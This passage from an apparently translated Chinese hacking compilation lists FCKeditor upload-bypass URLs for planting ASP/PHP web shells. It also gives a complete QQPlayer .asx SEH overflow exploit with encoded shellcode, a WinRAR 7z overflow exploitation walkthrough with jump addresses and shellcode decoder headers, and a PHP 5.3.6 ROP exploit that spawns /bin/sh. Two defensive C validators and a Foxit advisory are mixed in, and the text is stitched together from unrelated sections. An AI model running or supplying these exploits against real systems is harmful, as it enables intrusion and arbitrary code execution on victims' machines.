The space trick only works on Windows; *nix does not support it [there shell.php and shell.php+space are two different files; untested].
4.2: Uploading a file with the same name again yields shell.php;(1).jpg. You can also create a new folder: only the first-level directory is checked, so a second-level directory is unrestricted.
—————————————————————————————————————————————————————————————
5. Bypass by creating a folder
FCKeditor V2.6.6
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
—————————————————————————————————————————————————————————————
/wwwroot/userfiles/image/333.asp/2.asp;3.jpg
6. Upload addresses of the test files in FCKeditor
Latest: use the IIS parsing flaw by storing an image in an .asp folder, or as 2.asp;jpg
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
userfiles/file/1.asp;2(1).jpg
FCKeditor V2.6.6
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
—————————————————————————————————————————————————————————————
7. Commonly used upload addresses
FCKeditor v2.4.3
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor V2.6.6: cannot upload, cannot create
FCKeditor v2.4.3: can upload, can create
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver 2.6.3, tested)
JSP version:
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
Note: change the red part to the scripting language FCKeditor actually uses; the blue part can be a custom folder name or ../.. directory traversal; the purple part is the actual site address.
—————————————————————————————————————————————————————————————
8. Other upload addresses
All present
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
Many sites have already deleted the _samples directory, but it is worth trying.
FCKeditor V2.6.6 (blank)
FCKeditor v2.4.3: present
FCKeditor/editor/fckeditor.html cannot upload files directly, but clicking the upload-image button and then Browse Server takes you to a page where files can be uploaded.
—————————————————————————————————————————————————————————————
9. The directory-listing flaw also helps find upload addresses
Version 2.4.1, tested
Change the CurrentFolder parameter, using ../../ to enter other directories
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
The returned XML lets you view all of the site's directories.
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
The drive letter can also be browsed directly:
JSP version:
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
—————————————————————————————————————————————————————————————
10. Path disclosure flaw
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
—————————————————————————————————————————————————————————————
11. Weak filtering caused by FCKeditor's passive (deny-list) restriction policy
Affected versions: FCKeditor x.x <= FCKeditor v2.4.3
Vulnerability description:
Default denied upload types for the File category in FCKeditor v2.4.3:
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
FCKeditor 2.0 <= 2.2 allows uploading files with the extensions asa, cer, php2, php4, inc, pwml and pht. The uploaded file is saved directly with $sFilePath = $sServerDir . $sFileName, without using $sExtension as the suffix, which directly allows a bypass on Windows by appending a "." to the file name [untested].
Under Apache it can also be exploited because of the "Apache file name parsing defect". It is also suggested that, in other upload flaws, the File category be used when defining the TYPE variable, since according to FCKeditor's code its restriction list is the narrowest.
Being able to upload script files directly is of course ideal, but some versions may not allow it; then a "." or a space appended to the file name may bypass the check, or the parsing flaw can be used by creating an xxx.asp folder or uploading xx.asp;.jpg.
—————————————————————————————————————————————————————————————
12. The oldest flaw: no restriction on the Type parameter!
This was the first FCKeditor flaw I encountered. Version unknown, probably very old: the program does not check the type=xxx value. You can craft an upload with type=Image changed to Type=hsren, which creates a folder named hsren, a new type with no restrictions at all, so arbitrary scripts can be uploaded!
—————————————————————————————————————————————————————————————
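Every bypass in sections 2 through 12 above abuses one of three gaps in the upload connector: a trailing "." or space in the name, characters such as ";" or "/" that the web server interprets specially, or a Type parameter that is never compared against a fixed set. The C validator below is an added example written for this page, not FCKeditor's own code: it takes a resource type and a client-supplied file name and only returns a name to store when the type is allow-listed, trailing dots and spaces have been stripped, the name has exactly one dot with a plain base name, and the lower-cased extension is in that type's allow-list. The type and extension lists are constructed for the example and a deployment sets its own; validate_folder_name covers the CreateFolder case from section 5.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Result codes: ERR_TYPE = Type parameter not allow-listed (e.g. Type=hsren);
 * ERR_LENGTH = empty/too long; ERR_CHARS = separators, ';', ':', '%' or non-printable
 * bytes; ERR_BASENAME = base name empty or not [A-Za-z0-9_-]; ERR_EXTENSION = not allow-listed. */
enum upload_result { UPLOAD_OK = 0, ERR_TYPE = -1, ERR_LENGTH = -2, ERR_CHARS = -3,
                     ERR_BASENAME = -4, ERR_EXTENSION = -5 };

#define NAME_MAX_LEN 100

/* Allow-lists constructed for this example; a deployment sets its own. They state
 * what is permitted, unlike the deny-list quoted in section 11 above. */
static const char *const image_exts[] = { "jpg", "jpeg", "gif", "png", "bmp", NULL };
static const char *const file_exts[]  = { "pdf", "zip", "txt", "doc", NULL };
static const char *const media_exts[] = { "avi", "mp3", "mp4", "wav", NULL };
static const struct { const char *type; const char *const *exts; } types[] = {
    { "Image", image_exts }, { "File", file_exts }, { "Media", media_exts } };

static const char *const *exts_for_type(const char *type)
{
    for (size_t i = 0; i < sizeof types / sizeof types[0]; i++)
        if (strcmp(types[i].type, type) == 0)          /* exact, case-sensitive match */
            return types[i].exts;
    return NULL;
}

static int in_list(const char *const *list, const char *s)
{
    for (; *list; list++)
        if (strcmp(*list, s) == 0)
            return 1;
    return 0;
}

static int plain_name_char(unsigned char c) { return isalnum(c) || c == '_' || c == '-'; }

/* NewFolderName for CreateFolder: letters, digits, '_' and '-' only, so a folder
 * such as "shell.asp" (which IIS treats as script) is refused. */
int validate_folder_name(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > NAME_MAX_LEN)
        return ERR_LENGTH;
    for (size_t i = 0; i < n; i++)
        if (!plain_name_char((unsigned char)name[i]))
            return ERR_BASENAME;
    return UPLOAD_OK;
}

/* Validates an upload (Type parameter plus client-supplied file name). On success the
 * name to store, "<base>.<ext>" with a lower-cased extension, is written to out. */
int validate_upload(const char *type, const char *name, char *out, size_t outlen)
{
    const char *const *exts = exts_for_type(type);
    char work[NAME_MAX_LEN + 1];
    size_t n = strlen(name);
    char *dot, *p;

    if (!exts)
        return ERR_TYPE;
    if (n == 0 || n > NAME_MAX_LEN)
        return ERR_LENGTH;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        /* '/' and '\\' cover "../" traversal, ';' the IIS "x.asp;.jpg" form, '%' encoded
         * variants; rejecting non-printable bytes covers NUL, CR and LF tricks. */
        if (c < 0x20 || c > 0x7e || strchr("/\\;:%", c))
            return ERR_CHARS;
    }
    memcpy(work, name, n + 1);

    /* Windows and Apache ignore trailing '.' and ' ' ("shell.php.", "shell.php "),
     * so strip them before the extension is examined. */
    while (n > 0 && (work[n - 1] == '.' || work[n - 1] == ' '))
        work[--n] = '\0';

    dot = strrchr(work, '.');
    if (!dot || dot == work || dot[1] == '\0')
        return ERR_BASENAME;                           /* no extension, or empty base */
    for (p = work; p < dot; p++)                       /* exactly one dot: "a.php.jpg" is refused */
        if (!plain_name_char((unsigned char)*p))
            return ERR_BASENAME;
    for (p = dot + 1; *p; p++)
        *p = (char)tolower((unsigned char)*p);         /* "JPG" is compared as "jpg" */
    if (!in_list(exts, dot + 1))
        return ERR_EXTENSION;
    if (out && snprintf(out, outlen, "%s", work) >= (int)outlen)
        return ERR_LENGTH;
    return UPLOAD_OK;
}

int main(void)
{
    static const char *const cases[][2] = { { "Image", "girl.jpg" }, { "Image", "shell.php." },
        { "Image", "shell.asp;.jpg" }, { "Image", "shell.php.jpg" }, { "hsren", "shell.php" } };
    char stored[NAME_MAX_LEN + 1];
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        int r = validate_upload(cases[i][0], cases[i][1], stored, sizeof stored);
        printf("%-5s %-16s -> %s\n", cases[i][0], cases[i][1], r == UPLOAD_OK ? stored : "rejected");
    }
    return 0;
}
```

The stored name is built from the validated parts, never from the client's string, and the server decides the extension's spelling. Rejecting a second dot is stricter than FCKeditor's later "." to "_" rewrite, but it removes the whole class of double-extension names that Apache's mod_mime handling and the IIS semicolon quirk depend on.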
Part 8: Supplementary notes on overflow code and an introduction to the ptrace vulnerability
To make software development and debugging easier, early versions of Unix introduced a way to trace and control a running process: the ptrace system call. Through ptrace(), one process can dynamically read and write another process's memory and registers, including its instruction space, data space, stack and all of its registers.
Part 9: QQPlayer asx file processing buffer overflow vulnerability, vulnerability alert
#################################################################
#
# Title: QQPlayer asx File Processing Buffer Overflow Exploit
# Author: Li Qingshan of Information Security Engineering Center, School of Software and Microelectronics, Peking University
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Test: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
head = ''''''
junk = "A" * 1975
nseh = "\x42\x61\x21\x61"
seh = "\xa9\x9e\x41\x00"
adjust = "\x30\x83\xc0\x0c"
shellcode = ("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"
             "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"
             "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"
             "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"
             "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"
             "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")
junk_ = "R" * 8000
foot = '''_playlis.wma"/>
'''
payload = head + junk + nseh + seh + adjust + shellcode + junk_ + foot
fobj = open("poc.asx", "w")
fobj.write(payload)
fobj.close()
Part 10: Foxit Reader FreeType engine remote integer overflow vulnerability, vulnerability alert
Release date: -06-21
Updated: 2011-06-21
Affected systems:
Foxit Foxit Reader 4.x
Foxit Foxit Reader 3.x
Foxit Foxit Reader 2.x
Unaffected systems:
Foxit Foxit Reader 4.0.0.0619
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 48359
CVE ID: CVE-2011-1908
Foxit Reader is a small PDF document viewer and printing program. Foxit Reader's implementation of the FreeType engine contains a remote integer overflow vulnerability; an attacker can exploit it to execute arbitrary code, and it may cause a denial of service.
<* Source: David Seidman
Link: www.foxitsoftware.com/products/reader/security_bulletins.php#files
*>
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
Foxit
-----
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:
www.foxitsoft.com/wac/server_intro.php
Part 11: WinRAR 7z archive processing overflow analysis and exploitation, vulnerability alert
This article was published in the April issue of 《 防线》; the author and 《 防线》 retain copyright. Please cite the original source.
Intended readers: overflow enthusiasts
Prerequisites: assembly language, basic principles of buffer overflows
Text and figures by 孤烟逐云 (gyzy) [Department of Information Security, Jiangsu University & EvilOctal Security Team]
At the end of the year security.nnov.ru released a PoC for a WinRAR 7z overflow that can lead to execution of malicious code. Some may think a problem in the 7z format is not that serious, but WinRAR has a bug that is not quite a bug: it ignores the file extension. That means a 7z archive renamed to .rar is still extracted, which creates an opportunity for abuse. The Formats directory under WinRAR's installation directory holds many files with the .fmt extension; they are really DLLs that the main program calls to handle the different archive formats. In July the LZH format also had a stack overflow, but strictly speaking this 7z overflow cannot be called a stack overflow; once you have read the analysis you will see why.
Since a PoC already exists, there is no need to read the lengthy 7z format documentation ourselves. 7z is open source: the format description and an open-source project can be downloaded from its official site (www.7-zip.org), and interested readers can study the 7z file format in detail. Here I give directly the already-constructed malformed archive that the author published in the PoC code:
"\x37\x7A\xBC\xAF\x27\x1C\x00\x02" // the first 8 bytes are fixed
"\xEE\xD6\x49\x23" // CRC1 of the 32-byte 7z header
"\x00\x00\x00\x00\x00\x00\x00\x00" // offset of the next 7z header, 0 here
"\x2D\x40\x00\x00\x00\x00\x00\x00" // length of the next header, 0x402D here
"\x3D\xC3\xFE\x9B" // CRC2 of everything except the first 32 bytes
"\x01\x05\x01\x0E\x01\x80\x0F\x01\x80\x11\x80\x01\x00"; // start of the next header
char filename[0x400A]; // overlong file name, Unicode-encoded
unsigned char hz_part2[] =
"\x14\x0A\x01\x00\xF0\xDE\xE9\xB5\xBF\xF2\xC6\x01\x15\x06\x01\x00"
"\x20\x00\x00\x00\x00\x00"; // file attributes and other information
With that, a malformed 7z archive is constructed; compare it with the picture yourself, see Figure 1.
Figure 1
But don't rush to open it: WinRAR performs a CRC32 check on 7z archives, and if the check fails it reports the archive as damaged, so we must recompute the CRC values ourselves. Fortunately czy published a program on his blog for computing the 7z CRCs; I modified it slightly, and thank him here. If you want to do it by hand for practice, note one thing: because the second CRC value indirectly affects the first CRC check, the second CRC must be computed first. CRC32 algorithms are everywhere on the net, so I won't say more. The 7zCRC.exe I provide corrects test.rar in the current directory by default; please note that too. 7zCRC.exe can be found in the companion code on the 黑防 site.
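The two CRC values and the length field that the text says must be fixed up by hand are also the fields a parser should verify before it trusts anything else in the archive. The validator below is an added example written for this page, not czy's program or WinRAR's code. It follows the published 7z format (StartHeaderCRC covers the 20 bytes after it; NextHeaderCRC covers NextHeaderSize bytes starting at 32 + NextHeaderOffset) and checks the declared next-header bounds against the real file length before either CRC is compared, which is what stops a header claiming 0x402D bytes from being parsed out of a shorter file. build_sample constructs a minimal well-formed archive for the demonstration (its next header is the 13 opening bytes quoted above, used only as data) and fills in the CRCs in the order the text describes.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Signature header layout from the published 7z format: 6-byte signature, 2-byte
 * version, StartHeaderCRC over the 20 bytes that follow it, then NextHeaderOffset
 * (8), NextHeaderSize (8) and NextHeaderCRC (4). The next header starts at
 * 32 + NextHeaderOffset and is NextHeaderSize bytes long. */
#define SIG_HEADER_LEN 32
static const uint8_t k7zSignature[6] = { 0x37, 0x7A, 0xBC, 0xAF, 0x27, 0x1C };

enum sevenz_result {
    SEVENZ_OK = 0, SEVENZ_TOO_SHORT = -1, SEVENZ_BAD_SIGNATURE = -2,
    SEVENZ_BAD_START_CRC = -3, SEVENZ_NEXT_HEADER_OUT_OF_RANGE = -4, SEVENZ_BAD_NEXT_CRC = -5
};

struct sevenz_start_header { uint64_t next_offset; uint64_t next_size; uint32_t next_crc; };

/* Bitwise CRC-32 (reflected, polynomial 0xEDB88320), the checksum 7z uses. */
uint32_t crc32_ieee(const uint8_t *p, size_t n)
{
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        c ^= p[i];
        for (int k = 0; k < 8; k++)
            c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return ~c;
}

/* Little-endian field helpers. */
static uint32_t rd32(const uint8_t *p) { return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static uint64_t rd64(const uint8_t *p) { return (uint64_t)rd32(p) | (uint64_t)rd32(p + 4) << 32; }
static void wr32(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }
static void wr64(uint8_t *p, uint64_t v) { for (int i = 0; i < 8; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Checks the signature header, the declared next-header bounds and both CRCs
 * before any value from the next header (such as a file-name length) is used. */
int sevenz_check(const uint8_t *buf, size_t len, struct sevenz_start_header *out)
{
    struct sevenz_start_header h;

    if (len < SIG_HEADER_LEN)
        return SEVENZ_TOO_SHORT;
    if (memcmp(buf, k7zSignature, sizeof k7zSignature) != 0)
        return SEVENZ_BAD_SIGNATURE;
    if (crc32_ieee(buf + 12, 20) != rd32(buf + 8))
        return SEVENZ_BAD_START_CRC;
    h.next_offset = rd64(buf + 12);
    h.next_size   = rd64(buf + 20);
    h.next_crc    = rd32(buf + 28);
    /* Both fields come from the file; compare them against what is really present
     * without letting the addition wrap around. */
    if (h.next_offset > len - SIG_HEADER_LEN ||
        h.next_size > len - SIG_HEADER_LEN - h.next_offset)
        return SEVENZ_NEXT_HEADER_OUT_OF_RANGE;
    if (crc32_ieee(buf + SIG_HEADER_LEN + h.next_offset, (size_t)h.next_size) != h.next_crc)
        return SEVENZ_BAD_NEXT_CRC;
    if (out)
        *out = h;
    return SEVENZ_OK;
}

/* Constructed sample: signature header plus a 13-byte next header (the opening
 * bytes quoted in the article, used here only as data). NextHeaderCRC is filled in
 * first because StartHeaderCRC covers it, which is the ordering the text describes. */
size_t build_sample(uint8_t *buf, size_t cap)
{
    static const uint8_t next_header[] = { 0x01, 0x05, 0x01, 0x0E, 0x01, 0x80, 0x0F,
                                           0x01, 0x80, 0x11, 0x80, 0x01, 0x00 };
    size_t total = SIG_HEADER_LEN + sizeof next_header;

    if (cap < total)
        return 0;
    memset(buf, 0, SIG_HEADER_LEN);
    memcpy(buf, k7zSignature, sizeof k7zSignature);
    buf[6] = 0x00; buf[7] = 0x02;                                   /* format version 0.2 */
    memcpy(buf + SIG_HEADER_LEN, next_header, sizeof next_header);
    wr64(buf + 12, 0);                                              /* NextHeaderOffset */
    wr64(buf + 20, sizeof next_header);                             /* NextHeaderSize */
    wr32(buf + 28, crc32_ieee(next_header, sizeof next_header));   /* NextHeaderCRC first */
    wr32(buf + 8, crc32_ieee(buf + 12, 20));                        /* StartHeaderCRC second */
    return total;
}

int main(void)
{
    uint8_t buf[64];
    struct sevenz_start_header h = { 0, 0, 0 };
    size_t n = build_sample(buf, sizeof buf);

    printf("well-formed sample: %d (next header %llu bytes)\n", sevenz_check(buf, n, &h), (unsigned long long)h.next_size);
    wr64(buf + 20, 0x402D);                   /* claim the article's next-header length */
    wr32(buf + 8, crc32_ieee(buf + 12, 20));  /* with a matching StartHeaderCRC */
    printf("0x402D declared in a %zu-byte file: %d\n", n, sevenz_check(buf, n, NULL));
    return 0;
}
```

The order dependence the text mentions falls out of the layout: NextHeaderCRC is one of the 20 bytes that StartHeaderCRC protects, so a header patched in the other order fails the first check. The bounds test runs before the second CRC, because a size field that points past the end of the file is already invalid, whatever checksum accompanies it.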
A first try
You may wonder why in Figure 1 the file name is padded with repeated 0x9960. The answer is Unicode: 7z requires file names to be Unicode-encoded, and 0x9960 is the Unicode of two nops (0x90). I won't explain Unicode at length, but one thing to remember: bytes above 0x80 get converted. For example, 0x4100 is, as everyone knows, a capital A, but 0x9000 is not the familiar nop; depending on the locale it may be converted into garbage, and exactly this causes a lot of trouble for a clean exploit. Double-click to open the archive, then click "Extract To" to trigger it; WinRAR crashes, see Figure 2:
Figure 2
Offset: 90909090. EIP is overwritten. The next step is to locate the overflow point with the two-pass method, which I won't repeat; look it up in earlier issues of 黑防. I'll give the result directly: the overflow point is the four bytes starting at (filename+8). Since our shellcode is on the stack, one habitually thinks of the jmp esp address 0x7FFA4512 that is universal on Chinese XP/2k3. Here is my code:
char content[0x2005]; // 0x400A/2 = 0x2005, used for the ASCII to Unicode conversion
memset(content,0x41,0x2005); // padding with 0x41 causes no conversion problems
memcpy(content+4, "\x12\x45\xfa\x7f",4); //
MultiByteToWideChar(CP_ACP,0,content,0x2005,(LPWSTR)filename,0x400A); //Convert
WriteFile(h7z, (LPCVOID)filename,0x400A,&dwWritten,NULL);
At this point the stack is around 0x17Dxxxxx. Regenerate the archive right away and open it, but the faulting address is not on the stack, meaning EIP did not jump into the stack; see Figure 3:
Figure 3
Odd, where does the 3f come from? After some research: Unicode is a double-byte code and 3f represents an unknown character. After conversion by MultiByteToWideChar, the 16 bytes of the file name have become \x41\x00\x41\x00\x41\x00\x41\x00\x12\x00\x45\x00\x3f\x00\x41, so this address is unusable. The PoC author used 0x100201BB, which is in the .rdata section of 7zxa.dll; although it contains 0xBB, that byte is at one end, so we can pad it with a byte and not worry about conversion. But in testing I found that the load base of 7z.fmt and 7z.dll differs almost every time, so this address has to be abandoned too. Must we really give up?
Light at the end of the tunnel
Our jump address must meet three conditions: 1. it must jump back to the stack; 2. none of the four bytes may be > 0x80; 3. or, if a byte above 0x80 does appear, it must not be in the middle two positions.
I opened OllyDbg's memory map and searched module by module, and my persistence paid off: at the very top of all loaded modules, in the .text section of Shell32.dll, I found 0x7D646981. The jump address can then be constructed as 0x4100 0x4100 0x4100 0x8A7C 0x6900 0x6400 0x7D00, where 0x8A7C is the Unicode of 0x81. This is not a perfect solution: not every machine has a jmp esp at 0x7D646981, but under the same service pack the load base of Shell32.dll should be fixed; how to make it universal I leave to the reader. The shellcode-locating problem is settled for now, and the next problem is a shellcode that survives the conversion. Right: pure alphanumeric shellcode meets that requirement, and it is the only kind that survives MultiByteToWideChar. Luckily the previous issue of 黑防 published an article on writing pure alphanumeric shellcode, otherwise I would have to type for another hour :) If you don't yet have your own alphanumeric shellcode, I have found a generation template for you:
{ "eax", "PYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ecx", "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edx", "JJJJJJJJJJJJJJJJJ7RY" mixedcase_ascii_decoder_body },
{ "ebx", "SYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esp", "TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "ebp", "UYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "esi", "VYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "edi", "WYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp-10]", "LLLLLLLLLLLLLLLLYIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-C]", "LLLLLLLLLLLLYIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-8]", "LLLLLLLLYIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp-4]", "LLLL7YIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp]", "YIIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+4]", "YYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+8]", "YYYIIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+C]", "YYYYIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+10]", "YYYYYIIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+14]", "YYYYYYIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "[esp+18]", "YYYYYYYIIIIIIIIIIIIIIQZ" mixedcase_ascii_decoder_body },
{ "[esp+1C]", "YYYYYYYYIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body },
{ "seh", mixedcase_w32sehgetpc "IIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body }, // ecx code
These are the decoder headers; choose one according to which register points to the shellcode at the time of the overflow. The function that generates the shellcode body is in the companion code alphashellcode. Here we should pick the header TYIIIIIIIIIIIIIIII7QZ. The shellcode is rather long, so I will not paste it, lest I be accused of padding for the fee. Test again: success, see Figure 4:
Figure 4
Lingering doubts
Although the exploit succeeded, have you noticed some odd things? 1. If this is a stack overflow, why is the overflow point at the front of the over-long string rather than in the middle or at the end; surely its buffer is not just one byte? 2. Why is the vulnerability not triggered on opening but only on extraction? 3. Why does gyzy say this is not strictly a stack overflow? (sweat...) With this string of questions, any verbal guess is pale; let OllyDbg clear up our doubts. A side complaint: OllyDbg's handling of multiple threads is really not great; it often hangs for no obvious reason. First load WinRAR.exe and let OllyDbg run it; remember to change the jump address first, to avoid the embarrassment of it not breaking, and also remember to correct the CRC values, otherwise it will solemnly warn you. Pray your machine does not hang, amen, see Figure 5:
Figure 5
I find the original OllyDbg build a little more stable, so that is what I use. At this point EIP is already overwritten. I scrolled up and down through the stack window and could not find a normal return address. Strange, surely not every return address was overwritten? That is ruthless, not leaving a single clue; normally a stack walk finds the offending code easily. Things are getting more and more puzzling. Ctrl+F2 to restart, F9 to run, then bp CreateThread,
Part 12: PHP 5.3.6 buffer overflow PoC (ROP) CVE vulnerability alert
<?php
/*
** xiaolandjj@qq.com
** bbs.xxoxo.org
** July 15
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
** by: xiaolan
*/
echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n";
echo "[+] CVE--1938\n\n";
# /usr/bin/php gadgets
define("DUMMY",     "\x42\x42\x42\x42"); // padding
define("STACK",     "\x20\xba\x74\x08"); // .data 0x46a0: 0x874ba20
define("STACK4",    "\x24\xba\x74\x08"); // STACK + 4
define("STACK8",    "\x28\xba\x74\x08"); // STACK + 8
define("STACK12",   "\x3c\xba\x74\x08"); // STACK + 12
define("INT_80",    "\x27\xb6\x07\x08"); // 0x0807b627: int $0x80
define("INC_EAX",   "\x66\x50\x0f\x08"); // 0x080f5066: inc %eax | ret
define("XOR_EAX",   "\x60\xb4\x09\x08"); // 0x0809b460: xor %eax,%eax | ret
define("MOV_A_D",   "\x84\x3e\x12\x08"); // 0x08123e84: mov %eax,(%edx) | ret
define("POP_EBP",   "\xc7\x48\x06\x08"); // 0x080648c7: pop %ebp | ret
define("MOV_B_A",   "\x18\x45\x06\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define("MOV_DI_DX", "\x20\x26\x07\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define("POP_EDI",   "\x23\x26\x07\x08"); // 0x08072623: pop %edi | pop %ebp | ret
define("POP_EBX",   "\x0f\x4d\x21\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define("XOR_ECX",   "\xe3\x3b\x1f\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret
$padd = str_repeat("A", 196);
$payload = POP_EDI .   // pop %edi
    STACK .            // 0x874ba20
    DUMMY .            // pop %ebp
    MOV_DI_DX .        // mov %edi,%edx
    DUMMY .            // pop %esi
    DUMMY .            // pop %edi
    "//bi" .           // pop %ebp
    MOV_B_A .          // mov %ebp,%eax
    DUMMY .            // pop %ebx
    DUMMY .            // pop %esi
    DUMMY .            // pop %edi
    DUMMY .            // pop %ebp
    MOV_A_D .          // mov %eax,(%edx)
    POP_EDI .          // pop %edi
    STACK4 .           // 0x874ba24
    DUMMY .            // pop %ebp
    MOV_DI_DX .        // mov %edi,%edx
    DUMMY .            // pop %esi
    DUMMY .            // pop %edi
    "n/sh" .           // pop %ebp
    MOV_B_A .          // mov %ebp,%eax
    DUMMY .            // pop %ebx
    DUMMY .            // pop %esi
    DUMMY .            // pop %edi
    DUMMY .            // pop %ebp
    MOV_A_D .          // mov %eax,(%edx)
    POP_EDI .          // pop %edi
    STACK8 .           // 0x874ba28
    DUMMY .            // pop %ebp
    MOV_DI_DX .        // mov %edi,%edx
    DUMMY .            // pop %esi
    DUMMY .            // pop %edi
    DUMMY .            // pop %ebp
    XOR_EAX .          // xor %eax,%eax
    MOV_A_D .          // mov %eax,(%edx)
    XOR_ECX .          // xor %ecx,%ecx
    DUMMY .            // pop %ebx
    DUMMY .            // pop %esi
    DUMMY .            // pop %edi
    DUMMY .            // pop %ebp
    POP_EBX .          // pop %ebx
    STACK .            // 0x874ba20
    DUMMY .            // pop %esi
    DUMMY .            // pop %edi
    DUMMY .            // pop %ebp
    XOR_EAX .          // xor %eax,%eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INC_EAX .          // inc %eax
    INT_80;            // int $0x80
$evil = $padd . $payload;
$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>
Part 13: VLC Media Player HTML subtitle parsing buffer overflow vulnerability alert
Affected systems:
VideoLAN VLC Media Player 2.x
Description:
VLC Media Player is a multimedia player.
